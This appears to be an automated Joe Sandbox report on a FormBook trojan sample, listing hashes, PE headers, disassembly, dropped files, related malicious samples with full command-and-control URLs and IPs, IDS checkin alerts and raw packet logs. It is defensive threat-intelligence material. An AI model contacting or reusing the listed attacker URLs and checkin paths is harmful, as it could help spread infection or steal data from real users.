                                                                                                                                          https://pdds.quark.cn/download/stfile/rrxtuszryrsvrtzte/QuarkCloudDrive-v2.5.43-release-pckkisoburn.exe, 00000004.00000002.4122089347.0000000005B84000.00000004.10000000.00040000.00000000.sdmp, isoburn.exe, 00000004.00000002.4122089347.000000000635E000.00000004.10000000.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003DEE000.00000004.00000001.00040000.00000000.sdmp, UHPrrMeffyCaz.exe, 00000006.00000002.4121536658.0000000003614000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://www.apache.org/licenses/LICENSE-2.0WrrCV4QR2J.exe, 00000000.00000002.1686616226.0000000007132000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
IP    Domain    Country    Flag    ASN    ASN Name    Malicious
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1356273
Start date and time: 2023-12-08 14:49:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: WrrCV4QR2J.exe (renamed because original name is a hash value)
Original Sample Name: dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@17/15
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 139
• Number of non-executed functions: 338
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target UHPrrMeffyCaz.exe, PID 2364 because it is empty
• HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• VT rate limit hit for: WrrCV4QR2J.exe
Time        Type              Description
14:49:55    API Interceptor   2x Sleep call for process: WrrCV4QR2J.exe modified
14:50:42    API Interceptor   11099016x Sleep call for process: isoburn.exe modified
Match    Associated Sample Name / URL    SHA 256    Detection    Threat Name    Link    Context
                                                                                                                                                            • www.kermisbedrijfkramer.online/ao65/?GR0=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS1HIoJcoA9wm&IDK=RJBh5RS0IZO8zhrP
                                                                                                                                                            Document.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.qa-manny.com/cvps/?Tb-PA8s8=YYStJbUf5TaZehAWHAdvcDwKkN8dqWyQyqo9RJP/Q7ViCmgow6wyh8/3RNpMerc2KWMLTTY6CI9NpXl7SvcbIbeUXgqX6DnaKg==&0H=BrFhG8npvv
                                                                                                                                                            Hubnnuiisapctu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                            • www.kermisbedrijfkramer.online/ao65/?2d=Y9yn8u0REY9c1IpGc1acQeiywl67Bz4kR9nr06rl/WLBU1XMoiFOUgbvS2/hhpQTPLNwMSzDew==&3fC=vZeTzRlX84SHE
                                                                                                                                                            Invoice.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • www.wrautomotive.online/9hnx/?qjEABCG=x93wZY5flbcWgBQ+QBIan4Q/Fzujwl2X6zdiZc2Bln/4Iyn/0F+0HT2oZzLfP234arynxKxgoTzQXViUvY11cUD95//AJ74tDA==&KD=eYDR
                                                                                                                                                            Factura_1-000816pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • www.vdb2b.com/hedt/?iOOH=EEEIB&iC8-0=zKoVcsC5grZr6pX8QDgaiztoD/aYyGD3cWBaSuIr6nSXyRLF9phHpQybJRV7E4N8LdJP/dJhO/XvQgvS05+WXwT8k1ve1mAG6g==
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                            http://exclusifmoveis.com.br/new/authGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 108.179.252.38
                                                                                                                                                            http://p.feedblitz.com/t3.asp?/1081591/102442729/7821567_/~feeds.feedblitz.com/~/t/0/0/sethsblog/posts/~//solunadevelopment.com/yurwmc/lt/dGFuaWEucnVpc2Vjb0BzZWFib2FyZG1hcmluZS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            • 192.185.139.76
                                                                                                                                                            Paid_Invoices.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 69.49.229.22
                                                                                                                                                            SecuriteInfo.com.FileRepMalware.11812.16342.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 69.49.229.22
                                                                                                                                                            Agreement_SM15525032670443661924.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 108.179.242.32
                                                                                                                                                            http://kluvxhfql2.teamempirejp.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 192.254.235.137
                                                                                                                                                            BMhDm7YW62.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                                                                                                                            • 162.240.81.18
                                                                                                                                                            NEW_KSA-DUBAI_PROJECT_RFQ_DETAILS_#5688QM-988765RQ-ESPRIUS-DES-MWQTRMK.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 50.87.145.7
                                                                                                                                                            7NQmHsp3aG.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 162.241.252.161
                                                                                                                                                            https://r20.rs6.net/tn.jsp?f=0014mq83eSqn0kaNc_hoo4Y7UT70CU2szuYTIo-hWN-bnpW_37lKy8kj-ZVBURrzWkrqphuKB7_ms9nXnPsCeN19IzJrh7FdtpDLA4Kj_5L-vhd0fdO0dM7jglK-Up8iV8pyx42_d3yTzkepqtSfxwhK8VPKE9stEIggaZuWb2dYbLqBe29TKh8Ogxugd3aaVQ75Lx1LaOBkNtAONmqlxdzW5ntBeJPatCzzOiOxA0yob1MMiiM_pDmzKrEUemA3dzU&c=&ch=&__=/16:00/anVzdGluLmpvcmRhbkB3YXJyaW9yc2hlYXJ0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 192.185.156.197
                                                                                                                                                            No context
                                                                                                                                                            No context
                                                                                                                                                            Process:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1304
                                                                                                                                                            Entropy (8bit):5.342479910699661
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4DRE4mKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHDRHmYHKh3oPtHo6hAHKzP
                                                                                                                                                            MD5:69F4C6D6E1A57244AD636131ED81FDCF
                                                                                                                                                            SHA1:3BC170B8ED30C1968102F43661A91C548A593634
                                                                                                                                                            SHA-256:243AF877C88EEE73B052788B4C8FD440B044D99FA7C9BAE286887A5D1888D6EA
                                                                                                                                                            SHA-512:07A5D721605890AAA7D27531E6597951C74ED2EBA51DF5BFC94C66980E88663AA19D32E662D493BF2BF5062526EB895947FF2EB8F952C81D43191AE2C698A108
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Speech, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e
                                                                                                                                                            Process:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):114688
                                                                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                            Entropy (8bit):7.748908145630504
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                            File name:WrrCV4QR2J.exe
                                                                                                                                                            File size:786'432 bytes
                                                                                                                                                            MD5:26c7731786626894ce4fcc339951a26b
                                                                                                                                                            SHA1:5103ffe527e144a275696454b45b1bda26c152bd
                                                                                                                                                            SHA256:dc9c5d5251164a289cac05382c699c11fb51463f88fea60746dd571e1feeb5fc
                                                                                                                                                            SHA512:09f6b16bc15b7aa27f282d4870928622db04685edb14dde53a98e95bbb31bfa5bfe52f5da5d86ffbb4e542915f0019588f39ad69bd1963791d3290bda3130a1c
                                                                                                                                                            SSDEEP:12288:aY8YouBsfDr5camG+BhC4igF5Xmr12WTpYo62gYAlAd7BR6wT:aY8YoLffW5P3FW17TjHAOpB
                                                                                                                                                            TLSH:7BF4E00022F89BD5E17EABFA4C70711007B6792A6922EF0E4E9661DE1E71BC04572F5F
                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ce..............0......F......v.... ........@.. .......................`............@................................
                                                                                                                                                            Icon Hash:22ceac86b2968ee0
                                                                                                                                                            Entrypoint:0x4bd676
                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                            Digitally signed:false
                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                            Time Stamp:0x6563F09C [Mon Nov 27 01:27:56 2023 UTC]
                                                                                                                                                            TLS Callbacks:
                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                            OS Version Major:4
                                                                                                                                                            OS Version Minor:0
                                                                                                                                                            File Version Major:4
                                                                                                                                                            File Version Minor:0
                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                            Instruction
                                                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                                                            xor al, 34h
                                                                                                                                                            xor al, 34h
                                                                                                                                                            xor al, 35h
                                                                                                                                                            xor eax, 38464739h
                                                                                                                                                            push ebp
                                                                                                                                                            xor dh, byte ptr [354A464Fh]
                                                                                                                                                            push ebx
                                                                                                                                                            aaa
                                                                                                                                                            pop edx
                                                                                                                                                            xor al, 00h
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                            add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbd624 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xbe000 | 0x4204 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc4000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbb694 | 0xbb800 | False | 0.8672903645833333 | data | 7.765104825647267 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xbe000 | 0x4204 | 0x4400 | False | 0.23299632352941177 | data | 4.2977512789706305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xbe1c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.4326241134751773
RT_ICON | 0xbe628 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.2607879924953096
RT_ICON | 0xbf6d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.1912863070539419
RT_GROUP_ICON | 0xc1c78 | 0x30 | data | | | 0.8125
RT_GROUP_ICON | 0xc1ca8 | 0x14 | data | | | 1.1
RT_VERSION | 0xc1cbc | 0x35c | data | | | 0.413953488372093
RT_MANIFEST | 0xc2018 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
12/08/23-14:50:42.900472 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.4 | 74.208.236.181
12/08/23-14:51:57.012130 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49764 | 80 | 192.168.2.4 | 66.29.155.54
12/08/23-14:52:40.619764 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49776 | 80 | 192.168.2.4 | 85.159.66.93
12/08/23-14:53:57.335622 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49796 | 80 | 192.168.2.4 | 52.220.48.161
12/08/23-14:53:40.611998 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49792 | 80 | 192.168.2.4 | 37.97.254.27
12/08/23-14:50:19.134288 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49739 | 80 | 192.168.2.4 | 162.222.226.77
12/08/23-14:50:56.404687 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49748 | 80 | 192.168.2.4 | 104.21.18.253
12/08/23-14:53:26.280190 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49788 | 80 | 192.168.2.4 | 107.178.250.177
12/08/23-14:52:55.335271 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49780 | 80 | 192.168.2.4 | 162.241.252.161
12/08/23-14:51:11.265685 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49752 | 80 | 192.168.2.4 | 37.140.192.89
12/08/23-14:52:11.624074 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49768 | 80 | 192.168.2.4 | 34.117.26.57
12/08/23-14:51:27.263886 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49756 | 80 | 192.168.2.4 | 131.153.147.90
12/08/23-14:52:25.956590 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49772 | 80 | 192.168.2.4 | 81.169.145.70
12/08/23-14:51:42.204368 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49760 | 80 | 192.168.2.4 | 94.23.162.163
12/08/23-14:53:10.644355 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49784 | 80 | 192.168.2.4 | 185.74.252.11

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                            Dec 8, 2023 14:50:51.383879900 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:52.598052025 CET4974580192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.624420881 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.748687029 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.748953104 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.749476910 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:53.874031067 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874095917 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874147892 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874212027 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874243975 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874258995 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874289989 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:53.874311924 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:54.028893948 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:54.028924942 CET8049747104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:54.029001951 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:55.263717890 CET4974780192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.280004978 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.404164076 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.404413939 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.404686928 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.530968904 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686069965 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686326027 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.686408997 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.687506914 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:50:56.687572956 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.693876028 CET4974880192.168.2.4104.21.18.253
                                                                                                                                                            Dec 8, 2023 14:50:56.817867041 CET8049748104.21.18.253192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.289207935 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.564224005 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.564373016 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.564663887 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.840981960 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.846950054 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847130060 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847187042 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.847446918 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847461939 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.847503901 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.848145962 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.848288059 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.848329067 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.848998070 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.849178076 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.849267006 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:02.850562096 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.850574970 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:02.850610971 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.122236013 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122299910 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122450113 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122493029 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.122508049 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122608900 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.122766972 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122806072 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.122951984 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.123063087 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123101950 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123219013 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.123560905 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123600006 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123687983 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.123842955 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.123882055 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124037981 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.124422073 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124460936 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124569893 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124607086 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.124653101 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.124653101 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.125118971 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125157118 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125297070 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.125324965 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125364065 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.125435114 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400317907 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400424957 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400463104 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400509119 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400547028 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400559902 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400559902 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400584936 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400624037 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400664091 CET804974937.140.192.89192.168.2.4
                                                                                                                                                            Dec 8, 2023 14:51:03.400674105 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400674105 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:03.400738955 CET4974980192.168.2.437.140.192.89
                                                                                                                                                            Dec 8, 2023 14:51:04.349975109 CET4974980192.168.2.437.140.192.89
